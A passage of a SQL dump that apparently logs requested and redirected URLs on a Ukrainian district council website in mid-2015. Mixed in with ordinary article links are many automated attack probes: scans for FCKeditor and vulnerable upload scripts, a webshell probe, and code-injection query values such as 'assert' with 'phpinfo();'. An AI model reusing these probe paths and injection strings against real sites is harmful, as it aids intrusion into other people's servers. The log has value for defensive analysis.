00:00:00',301),(14440,'http://www.malyn-rayrada.org.ua/sites/all/libraries/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:19:48','0000-00-00 00:00:00',301),(14441,'http://www.malyn-rayrada.org.ua/system/ext/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:19:50','0000-00-00 00:00:00',301),(14442,'http://www.malyn-rayrada.org.ua/portlets/sisRapid/dream/libs/V2.56/vcl/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:19:52','0000-00-00 00:00:00',301),(14443,'http://www.malyn-rayrada.org.ua/themes/mantaTheme1/newsmail/templates/javaScript/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:19:54','0000-00-00 00:00:00',301),(14444,'http://www.malyn-rayrada.org.ua/modules/editor/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:19:56','0000-00-00 00:00:00',301),(14445,'http://www.malyn-rayrada.org.ua/utilities/external/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:19:58','0000-00-00 00:00:00',301),(14446,'http://www.malyn-rayrada.org.ua/distancelearning/sites/all/modules/fckeditor/fckeditor/editor/fckeditor.htm','','','',1,0,'2015-06-26 13:20:01','0000-00-00 00:00:00',301),(14447,'http://www.malyn-rayrada.org.ua/cms/app/webroot/js/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:20:04','0000-00-00 00:00:00',301),(14448,'http://www.malyn-rayrada.org.ua/script/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:20:06','0000-00-00 00:00:00',301),(14449,'http://www.malyn-rayrada.org.ua/componentes3.7/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:20:09','0000-00-00 00:00:00',301),(14450,'http://www.malyn-rayrada.org.ua/common/third_party/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:20:11','0000-00-00 00:00:00',301),(14451,'http://www.malyn-rayrada.org.ua/wp-content/plugins/fckeditor_for_wordpress/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:20:13','0000-00-00 00:00:00',301),(14452,'http://www.malyn-rayrada.org.ua/~cwcheng/C_Lan/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:20:15','0000-00-00 00:00:00',301),(14453,'http://www.malyn-rayrada.org.ua/Providers/HtmlEditorProviders/Fck/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:20:18','0000-00-00 00:00:00',301),(14454,'http://www.malyn-rayrada.org.ua/affiliate/affiliate53/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:20:20','0000-00-00 00:00:00',301),(14455,'http://www.malyn-rayrada.org.ua/bip/KW/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:20:23','0000-00-00 00:00:00',301),(14456,'http://www.malyn-rayrada.org.ua/files/static/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:20:25','0000-00-00 00:00:00',301),(14457,'http://www.malyn-rayrada.org.ua/app/resources/javascript/FCKeditor/2.3.1/editor/fckeditor.html','','','',1,0,'2015-06-26 13:20:27','0000-00-00 00:00:00',301),(14458,'http://www.malyn-rayrada.org.ua/forms/admin/scripts/fckeditor.2641/editor/fckeditor.html','','','',1,0,'2015-06-26 13:20:30','0000-00-00 00:00:00',301),(14459,'http://www.malyn-rayrada.org.ua/template/js_lib/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:20:32','0000-00-00 00:00:00',301),(14460,'http://www.malyn-rayrada.org.ua/intranet/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:20:34','0000-00-00 00:00:00',301),(14461,'http://www.malyn-rayrada.org.ua/bscw_resources/javascript/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:20:36','0000-00-00 00:00:00',301),(14462,'http://www.malyn-rayrada.org.ua/addon/FCKeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:20:38','0000-00-00 00:00:00',301),(14463,'http://www.malyn-rayrada.org.ua/dadamail/dada/extras/packages/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:20:41','0000-00-00 00:00:00',301),(14464,'http://www.malyn-rayrada.org.ua/includes/phpEasyAdmin/form/textarea/editor/fckeditor.html','','','',1,0,'2015-06-26 13:20:43','0000-00-00 00:00:00',301),(14465,'http://www.malyn-rayrada.org.ua/webyep-system/program/opt/fckeditor/editor/fckeditor.html','','','',1,0,'2015-06-26 13:20:45','0000-00-00 00:00:00',301),(14466,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1254:-1-50&lang=ru&option=com_content&view=article','','','',3,0,'2015-06-26 23:24:55','0000-00-00 00:00:00',301),(14467,'http://malyn-rayrada.org.ua/images/stories/magic.php?baca','','','',2,0,'2015-06-27 11:21:43','0000-00-00 00:00:00',301),(14468,'http://www.malyn-rayrada.org.ua/ind','','','',2,0,'2015-06-27 12:42:52','0000-00-00 00:00:00',301),(14469,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=750:2012-09-01-09-40-02&lang=ru&option=com_content&view=article','','','',2,0,'2015-06-28 08:08:16','0000-00-00 00:00:00',301),(14470,'http://www.malyn-rayrada.org.ua/index.php?Itemid=47&catid=21&id=27:2010-06-07-11-05-24&lang=en&option=com_content&view=article','','','',1,0,'2015-06-28 09:37:28','0000-00-00 00:00:00',301),(14471,'http://www.malyn-rayrada.org.ua/index.php/121-z-novim-rokom-ta-rizdvom-hristovim?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-06-28 18:39:56','0000-00-00 00:00:00',301),(14472,'http://www.malyn-rayrada.org.ua/index.php/1084-grafik-provedennya-zasidannya-postijnikh-komisij?tmpl=component&print=1&layout=default&page=','','','',2,0,'2015-06-29 02:59:55','0000-00-00 00:00:00',301),(14473,'http://www.malyn-rayrada.org.ua/index.php/298-zasluzhenomu-budivelniku-ukraini-viktoru-jakovichu?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-06-29 05:28:13','0000-00-00 00:00:00',301),(14474,'http://malyn-rayrada.org.ua/administrator/components/com_civicrm/civicrm/packages/OpenFlashChart/php-ofc-library/ofc_upload_image.php','','','',10,0,'2015-06-29 11:43:09','0000-00-00 00:00:00',301),(14475,'http://malyn-rayrada.org.ua/administrator/components/com_maian15/charts/php-ofc-library/ofc_upload_image.php','','','',10,0,'2015-06-29 11:43:14','0000-00-00 00:00:00',301),(14476,'http://malyn-rayrada.org.ua/modules/mod_artuploader/upload.php','','','',1,0,'2015-06-29 11:43:17','0000-00-00 00:00:00',301),(14477,'http://malyn-rayrada.org.ua/modules/mod_dionefileuploader/upload.php','','','',1,0,'2015-06-29 11:43:19','0000-00-00 00:00:00',301),(14478,'http://malyn-rayrada.org.ua/mambots/editors/wysiwygpro/document.php','','','',1,0,'2015-06-29 11:43:22','0000-00-00 00:00:00',301),(14479,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33&id=326:2011-05-20-16-17-28&lang=uk&option=com_content&view=article','','','',3,0,'2015-06-29 15:13:28','0000-00-00 00:00:00',301),(14480,'http://www.malyn-rayrada.org.ua/index.php/61-splivajut-ostanni-godini-dlja-podachi-dokumentiv?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-06-29 23:23:36','0000-00-00 00:00:00',301),(14481,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=763:2012-09-24-07-57-43&lang=ru','','','',1,0,'2015-06-30 03:06:30','0000-00-00 00:00:00',301),(14482,'http://www.malyn-rayrada.org.ua/index.php/297-startuvala-vstupna-kampanija?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-06-30 11:27:17','0000-00-00 00:00:00',301),(14483,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1183:2014-01-28-09-18-31&lang=uk&option=com_content&view=article','','','',2,0,'2015-06-30 12:15:14','0000-00-00 00:00:00',301),(14484,'http://www.malyn-rayrada.org.ua/index.php?Itemid=88&catid=49&id=949:2013-03-06-12-51-36&lang=uk&option=com_content&view=article','','','',7,0,'2015-06-30 15:35:46','0000-00-00 00:00:00',301),(14485,'http://malyn-rayrada.org.ua/editor/editor','','','',1,0,'2015-06-30 15:53:21','0000-00-00 00:00:00',301),(14486,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43:--25072012-&id=746:-2012-&lang=uk&option=com_content&view=article','','','',4,0,'2015-06-30 20:06:27','0000-00-00 00:00:00',301),(14487,'http://www.malyn-rayrada.org.ua/index.php?Itemid=0&catid=11&id=1231:-q-q&lang=ru&option=com_content&view=article','','','',1,0,'2015-07-01 00:50:41','0000-00-00 00:00:00',301),(14488,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=787:2012-10-15-09-13-25&lang=uk&option=com_content&view=article','','','',2,0,'2015-07-01 00:50:43','0000-00-00 00:00:00',301),(14489,'http://www.malyn-rayrada.org.ua/index.php/301-opriljudnennja-dohodiv-golovi-malinskoi-rajonnoi?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-07-01 10:54:34','0000-00-00 00:00:00',301),(14490,'http://www.malyn-rayrada.org.ua/index.php/578-vikonannja-dohidnoi-chastini-za-pershe-pivrichchja?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-07-01 12:09:13','0000-00-00 00:00:00',301),(14491,'http://www.malyn-rayrada.org.ua/index.php/75-vitaemo-iz-svjatom-8-bereznja?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-07-01 14:10:14','0000-00-00 00:00:00',301),(14492,'http://www.malyn-rayrada.org.ua/index.php/471-upravlinnja-statistiki-u-m-malini-informue_2?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-07-01 16:10:00','0000-00-00 00:00:00',301),(14493,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37:--21102011-&id=409:-2011-&lang=uk&option=com_content&view=article','','','',2,0,'2015-07-02 00:26:29','0000-00-00 00:00:00',301),(14494,'http://www.malyn-rayrada.org.ua/index.php/465-ogoloshennja_3?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-07-02 02:40:48','0000-00-00 00:00:00',301),(14495,'http://www.malyn-rayrada.org.ua/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php','','','',2,0,'2015-07-02 07:21:04','0000-00-00 00:00:00',301),(14496,'http://www.malyn-rayrada.org.ua/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2015&Month=06','','','',1,0,'2015-07-02 07:21:04','0000-00-00 00:00:00',301),(14497,'http://www.malyn-rayrada.org.ua/wp-content/plugins/wp-symposium/server/php/index.php','','','',2,0,'2015-07-02 07:26:19','0000-00-00 00:00:00',301),(14498,'http://www.malyn-rayrada.org.ua/wp-content/plugins/dzs-zoomsounds/admin/upload.php','','','',4,0,'2015-07-02 07:30:16','0000-00-00 00:00:00',301),(14499,'http://www.malyn-rayrada.org.ua/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php','','','',2,0,'2015-07-02 07:38:16','0000-00-00 00:00:00',301),(14500,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=944:-----l---r--------------&lang=ru&option=com_content&view=article','','','',2,0,'2015-07-02 07:42:59','0000-00-00 00:00:00',301),(14501,'http://www.malyn-rayrada.org.ua/wp-content/plugins/wpshop/includes/ajax.php','','','',2,0,'2015-07-02 08:34:49','0000-00-00 00:00:00',301),(14502,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=411:-2014-&catid=37&Itemid=72&lang=ru','','','',5,0,'2015-07-02 08:35:56','0000-00-00 00:00:00',301),(14503,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1216:-q-q&lang=ru&option=com_content&view=article','','','',2,0,'2015-07-02 08:41:11','0000-00-00 00:00:00',301),(14504,'http://www.malyn-rayrada.org.ua/wp-admin/admin-ajax.php?action=widgets_init&Action=UPCP_AddProductSpreadsheet','','','',2,0,'2015-07-02 09:02:16','0000-00-00 00:00:00',301),(14505,'http://www.malyn-rayrada.org.ua/wp-content/plugins/ultimate-product-catalogue/product-sheets/wp-setup.php','','','',2,0,'2015-07-02 09:07:49','0000-00-00 00:00:00',301),(14506,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=738:-c-&catid=43:--25072012-&Itemid=82&lang=en','','','',35,0,'2015-07-02 09:44:45','0000-00-00 00:00:00',301),(14507,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=800:-l-r&catid=45:--14112012-&Itemid=84&lang=uk','','','',55,0,'2015-07-02 20:30:03','0000-00-00 00:00:00',301),(14508,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=756:-2012-&catid=44:--12092012-&Itemid=83&lang=en','','','',2,0,'2015-07-02 23:17:26','0000-00-00 00:00:00',301),(14509,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=836:-6732012&Itemid=14&lang=en&option=com_content&view=article','','','',10,0,'2015-07-03 14:28:26','0000-00-00 00:00:00',301),(14510,'http://malyn-rayrada.org.ua/index.php/1127-urochistosti-ta-svyatkovij-kontsert-do-dnya-medichnogo-pratsivnika','','','',4,0,'2015-07-03 22:19:36','0000-00-00 00:00:00',301),(14511,'http://www.malyn-rayrada.org.ua/index.php/1127-urochistosti-ta-svyatkovij-kontsert-do-dnya-medichnogo-pratsivnika','','','',24,0,'2015-07-03 22:24:05','0000-00-00 00:00:00',301),(14512,'http://malyn-rayrada.org.ua/index.php/1119-zasidannya-vr-ukrajini-18-06-2015-onlajn-translyatsiya','','','',2,0,'2015-07-06 11:22:34','0000-00-00 00:00:00',301),(14513,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=758:--15---&Itemid=14&lang=en&option=com_content&view=article','','','',34,0,'2015-07-06 18:07:30','0000-00-00 00:00:00',301),(14514,'http://www.malyn-rayrada.org.ua/index.php?Itemid=1&id=4&lang=uk&option=com_phocagallery&view=category','','http://go.mail.ru/search_images','',4,0,'2015-07-06 18:23:32','0000-00-00 00:00:00',301),(14515,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=763:2012-09-24-07-57-43&lang=ru&option=com_content&view=article','','','',3,0,'2015-07-07 04:21:51','0000-00-00 00:00:00',301),(14516,'http://www.malyn-rayrada.org.ua/index.php?option=com_easyblog&view=dashboard&layout=write','','http://www.malyn-rayrada.org.ua','',14,0,'2015-07-07 15:43:07','0000-00-00 00:00:00',301),(14517,'http://www.malyn-rayrada.org.ua/index.php?Itemid=39&catid=16&id=277:-2010-&lang=ru&option=com_content&view=article','','','',3,0,'2015-07-08 13:16:39','0000-00-00 00:00:00',301),(14518,'http://malyn-rayrada.org.ua/index.php/1127-urochistosti-ta-svyatkovij-kontsert-do-dnya-medichnogo-pratsivnika?tmpl=component&print=1&layout=default&page=','','','',1,0,'2015-07-08 19:08:42','0000-00-00 00:00:00',301),(14519,'http://malyn-rayrada.org.ua/index.php?option=com_adsmanager&task=upload&tmpl=component','','','',66,0,'2015-07-08 19:13:27','0000-00-00 00:00:00',301),(14520,'http://malyn-rayrada.org.ua/wp-admin/admin-ajax.php?action=revslider_ajax_action','','','',43,0,'2015-07-08 19:13:28','0000-00-00 00:00:00',301),(14521,'http://www.malyn-rayrada.org.ua/index.php?option=com_adsmanager&task=upload&tmpl=component','','','',169,0,'2015-07-08 21:40:37','0000-00-00 00:00:00',301),(14522,'http://malyn-rayrada.org.ua/tmp/sfx.php?fun=assert&id_polls=phpinfo();','','','',1,0,'2015-07-08 22:37:32','0000-00-00 00:00:00',301),(14523,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=548:-2011-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',7,0,'2015-07-09 03:45:34','0000-00-00 00:00:00',301),(14524,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=198:------------2006-2010-r&Itemid=60&lang=ru&option=com_content&view=article','','','',2,0,'2015-07-09 03:57:27','0000-00-00 00:00:00',301),(14525,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=844:------------2013--&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',4,0,'2015-07-10 05:24:58','0000-00-00 00:00:00',301),(14526,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=915:--------14--2012--340-l---------2012-2013-------------&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',1,0,'2015-07-10 05:28:26','0000-00-00 00:00:00',301),(14527,'http://www.malyn-rayrada.org.ua/index.php?catid=10:2010-06-05-13-46-44&id=1263:2014-03-31-14-00-08&Itemid=17&lang=uk&option=com_content&view=article','','','',5,0,'2015-07-10 19:36:58','0000-00-00 00:00:00',301),(14528,'http://malyn-rayrada.org.ua/administrator/components/com_messages/toolbar.messages.php?req=phpinfo();','','','',1,0,'2015-07-12 03:19:25','0000-00-00 00:00:00',301),(14529,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1028:-lr&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',4,0,'2015-07-12 12:19:09','0000-00-00 00:00:00',301),(14530,'http://www.malyn-rayrada.org.ua/attachments/article/1122/ÐŸÑƒÑ Ñ‚Ð¾Ð²Ð¾Ð¹Ñ‚ÐµÐ½ÐºÐ¾.pdf','','','',1,0,'2015-07-14 09:57:33','0000-00-00 00:00:00',301),(14531,'http://www.malyn-rayrada.org.ua/attachments/article/1122/Тиднюк.pdf','','','',1,0,'2015-07-14 10:50:09','0000-00-00 00:00:00',301),(14532,'http://www.malyn-rayrada.org.ua/attachments/article/1122/Захарчук.pdf','','','',1,0,'2015-07-14 12:18:10','0000-00-00 00:00:00',301),(14533,'http://www.malyn-rayrada.org.ua/attachments/article/1122/Чапік.pdf','','','',1,0,'2015-07-14 13:21:37','0000-00-00 00:00:00',301),(14534,'http://www.malyn-rayrada.org.ua/attachments/article/1122/ÐœÐ°Ð»ÐµÐ³ÑƒÑ .pdf','','','',1,0,'2015-07-14 13:24:18','0000-00-00 00:00:00',301),(14535,'http://www.malyn-rayrada.org.ua/attachments/article/1122/Зайцева.pdf','','','',1,0,'2015-07-14 13:49:28','0000-00-00 00:00:00',301),(14536,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-07-09-15-05/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-07-09-15-05/156-reglament-roboti-rajonnoi-radi-6-sklikannja','',2,0,'2015-07-15 17:20:22','0000-00-00 00:00:00',301),(14537,'http://www.malyn-rayrada.org.ua/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php?Year=2015&Month=07','','','',1,0,'2015-07-17 08:45:08','0000-00-00 00:00:00',301),(14538,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=787:2012-10-15-09-13-25&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2015-07-20 13:04:07','0000-00-00 00:00:00',301),(14539,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=800:-----l--r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',3,0,'2015-07-20 14:04:12','0000-00-00 00:00:00',301),(14540,'http://malyn-rayrada.org.ua/index.php?option=com_myblog&task=ajaxupload','','','',9,0,'2015-07-20 15:23:09','0000-00-00 00:00:00',301),(14541,'http://malyn-rayrada.org.ua/administrator/components/com_akeeba/version.php?lala=phpinfo();','','','',1,0,'2015-07-21 23:17:44','0000-00-00 00:00:00',301),(14542,'http://malyn-rayrada.org.ua/plugins/user/configseparator.php','','','',1,0,'2015-07-23 04:28:54','0000-00-00 00:00:00',301),(14543,'http://www.malyn-rayrada.org.ua/index.php?option=com_kide','','http://www.malyn-rayrada.org.ua','',1,0,'2015-07-25 08:53:45','0000-00-00 00:00:00',301),(14544,'http://www.malyn-rayrada.org.ua/index.php?Itemid&lang=uk&option=com_phocagallery&view=categories','','http://go.mail.ru/search_images','',4,0,'2015-07-27 08:31:20','0000-00-00 00:00:00',301),(14545,'http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/media/system/images/mootree_loader.gif','','http://malyn-rayrada.org.ua/index.php/2010-06-05-13-46-44/1147-lyubovitska-silska-rada-informue','',1,0,'2015-07-27 18:59:08','0000-00-00 00:00:00',301),(14546,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=512:2011-12-21-12-46-13&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',2,0,'2015-07-27 21:24:45','0000-00-00 00:00:00',301),(14547,'http://www.malyn-rayrada.org.ua/index.php?lang=uk&option=com_phocagallery&view=categories','','http://go.mail.ru/search_images','',4,0,'2015-07-29 05:24:59','0000-00-00 00:00:00',301),(14548,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=411:------------2014-&catid=36&Itemid=70&lang=ru','','','',1,0,'2015-07-29 06:33:23','0000-00-00 00:00:00',301),(14549,'http://malyn-rayrada.org.ua/modules/mod_ariimageslidersa/mod_ariimageslidersa.php','','','',4,0,'2015-07-30 15:36:42','0000-00-00 00:00:00',301),(14550,'http://malyn-rayrada.org.ua/modules/mod_araticlws/mod_araticlws.php','','','',4,0,'2015-07-30 15:36:42','0000-00-00 00:00:00',301),(14551,'http://www.malyn-rayrada.org.ua/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc','','','',2,0,'2015-07-30 16:10:07','0000-00-00 00:00:00',301),(14552,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11&id=1196:2014-01-30-14-12-50&lang=en&option=com_content&view=article','','','',1,0,'2015-07-30 18:42:00','0000-00-00 00:00:00',301),(14553,'http://www.malyn-rayrada.org.ua/index.php?Itemid=84&catid=45&id=817:---------------l--r&lang=ru&option=com_content&view=article','','','',2,0,'2015-08-01 23:14:01','0000-00-00 00:00:00',301),(14554,'http://malyn-rayrada.org.ua/kauppa/wp-admin/admin-ajax.php','','','',1,0,'2015-08-02 20:39:05','0000-00-00 00:00:00',301),(14555,'http://malyn-rayrada.org.ua/kauppa/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css','','','',1,0,'2015-08-02 20:39:06','0000-00-00 00:00:00',301),(14556,'http://malyn-rayrada.org.ua/kauppa/index.php','','','',1,0,'2015-08-02 20:39:07','0000-00-00 00:00:00',301),(14557,'http://malyn-rayrada.org.ua/forum/wp-admin/admin-ajax.php','','','',1,0,'2015-08-03 15:22:22','0000-00-00 00:00:00',301),(14558,'http://malyn-rayrada.org.ua/forum/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css','','','',1,0,'2015-08-03 15:22:24','0000-00-00 00:00:00',301),(14559,'http://malyn-rayrada.org.ua/forum/index.php','','','',1,0,'2015-08-03 15:22:26','0000-00-00 00:00:00',301),(14560,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1322:------------2012-2015-&lang=uk&option=com_content&view=article','','','',3,0,'2015-08-05 13:27:37','0000-00-00 00:00:00',301),(14561,'http://www.malyn-rayrada.org.ua/index.php?Itemid&lang=en&option=com_phocagallery&view=categories','','','',4,0,'2015-08-05 20:27:40','0000-00-00 00:00:00',301),(14562,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1227:2014-02-25-07-36-58&lang=uk&option=com_content&view=article','','','',1,0,'2015-08-05 20:27:41','0000-00-00 00:00:00',301),(14563,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33&id=312:-2011-&lang=ru&option=com_content&view=article','','','',3,0,'2015-08-05 22:14:43','0000-00-00 00:00:00',301),(14564,'http://malyn-rayrada.org.ua/index.php/203-zaversheno-pidgotovku-do-provedennja-chergovoi','','','',1,0,'2015-08-06 08:48:22','0000-00-00 00:00:00',301),(14565,'http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-07-07-54-47/media/system/images/mootree_loader.gif','','http://www.malyn-rayrada.org.ua/index.php/deputatska-storinka/2010-06-07-07-54-47/39-pro-zvernennja-gromadjan','',1,0,'2015-08-06 14:05:05','0000-00-00 00:00:00',301),(14566,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1245:2014-03-17-17-23-36&lang=uk&option=com_content&view=article','','','',1,0,'2015-08-06 17:38:57','0000-00-00 00:00:00',301),(14567,'http://malyn-rayrada.org.ua/index.php/rishenn','','','',2,0,'2015-08-06 18:23:56','0000-00-00 00:00:00',301),(14568,'http://www.malyn-rayrada.org.ua/index.php?Itemid=98&catid=57&id=1273:2014-04-10-06-15-24&lang=uk&option=com_content&view=article','','','',1,0,'2015-08-06 22:13:32','0000-00-00 00:00:00',301),(14569,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1268:---------------l-r&lang=ru&option=com_content&view=article','','','',2,0,'2015-08-06 22:13:33','0000-00-00 00:00:00',301),(14570,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1283:2014-04-15-16-30-00&lang=ru&option=com_content&view=article','','','',5,0,'2015-08-07 00:06:31','0000-00-00 00:00:00',301),(14571,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=751:-15-6-&lang=uk&option=com_content&view=article','','','',1,0,'2015-08-07 00:49:59','0000-00-00 00:00:00',301),(14572,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1245:2014-03-17-17-23-36&lang=ru&option=com_content&view=article','','','',1,0,'2015-08-07 01:00:34','0000-00-00 00:00:00',301),(14573,'http://www.malyn-rayrada.org.ua/index.php?Itemid=85&catid=46:--21122012&id=882:2012-12-21-17-08-23&lang=ru&option=com_content&view=article','','','',3,0,'2015-08-07 03:18:51','0000-00-00 00:00:00',301),(14574,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1035:2013-06-25-09-55-31&lang=en&option=com_content&view=article','','http://go.mail.ru/search_images','',3,0,'2015-08-07 06:51:38','0000-00-00 00:00:00',301),(14575,'http://www.malyn-rayrada.org.ua/index.php?Itemid=17&catid=10:2010-06-05-13-46-44&id=1255:2014-03-27-06-02-11&lang=uk&option=com_content&view=article','','','',4,0,'2015-08-07 08:11:11','0000-00-00 00:00:00',301),(14576,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=922:2013-02-11-10-53-17&lang=en&option=com_content&view=article','','http://go.mail.ru/search_images','',3,0,'2015-08-07 09:40:43','0000-00-00 00:00:00',301),(14577,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1202:2014-01-31-07-45-54&lang=uk&option=com_content&view=article','','','',3,0,'2015-08-08 04:38:36','0000-00-00 00:00:00',301),(14578,'http://www.malyn-rayrada.org.ua/index.php?Itemid=82&catid=43&id=708:-l-r&lang=ru&option=com_content&view=article','','','',3,0,'2015-08-08 08:42:00','0000-00-00 00:00:00',301),(14579,'http://www.malyn-rayrada.org.ua/index.php?Itemid=66&catid=33&id=311:-v-&lang=uk&option=com_content&view=article','','','',1,0,'2015-08-08 15:17:19','0000-00-00 00:00:00',301),(14580,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1293:-2014-&lang=ru&option=com_content&view=article','','','',1,0,'2015-08-08 15:17:21','0000-00-00 00:00:00',301),(14581,'http://www.malyn-rayrada.org.ua/index.php?Itemid&catid=11&id=1237:-200-&lang=uk&option=com_content&view=article','','','',1,0,'2015-08-08 20:59:17','0000-00-00 00:00:00',301),(14582,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36:2011-07-21-07-51-53&id=1191:------2014-&lang=ru&option=com_content&view=article','','','',2,0,'2015-08-08 22:09:38','0000-00-00 00:00:00',301),(14583,'http://www.malyn-rayrada.org.ua/index.php?Itemid=86&catid=47:-21022013-&id=930:2013-02-21-09-13-00&lang=ru&option=com_content&view=article','','','',1,0,'2015-08-09 05:40:15','0000-00-00 00:00:00',301),(14584,'http://www.malyn-rayrada.org.ua/index.php?Itemid=97&catid=56&id=1197:-l-r-&lang=uk&option=com_content&view=article','','','',1,0,'2015-08-09 06:09:33','0000-00-00 00:00:00',301),(14585,'http://www.malyn-rayrada.org.ua/index.php?Itemid=70&catid=36&id=1243:2014-03-17-07-32-47&lang=uk&option=com_content&view=article','','','',1,0,'2015-08-09 06:09:34','0000-00-00 00:00:00',301),(14586,'http://www.malyn-rayrada.org.ua/index.php?Itemid=83&catid=44&id=756:-2012-&lang=ru&option=com_content&view=article','','','',1,0,'2015-08-09 18:10:28','0000-00-00 00:00:00',301),(14587,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1121:-24-6-&lang=ru&option=com_content&view=article','','','',2,0,'2015-08-09 18:10:30','0000-00-00 00:00:00',301),(14588,'http://www.malyn-rayrada.org.ua/index.php?Itemid=72&catid=37:--21102011-&id=437:-----l-r--2012-2015-&lang=uk&option=com_content&view=article','','','',4,0,'2015-08-09 22:25:34','0000-00-00 00:00:00',301),(14589,'http://malyn-rayrada.org.ua/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php','','http://malyn-rayrada.org.ua/administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php','',3,0,'2015-08-10 07:58:29','0000-00-00 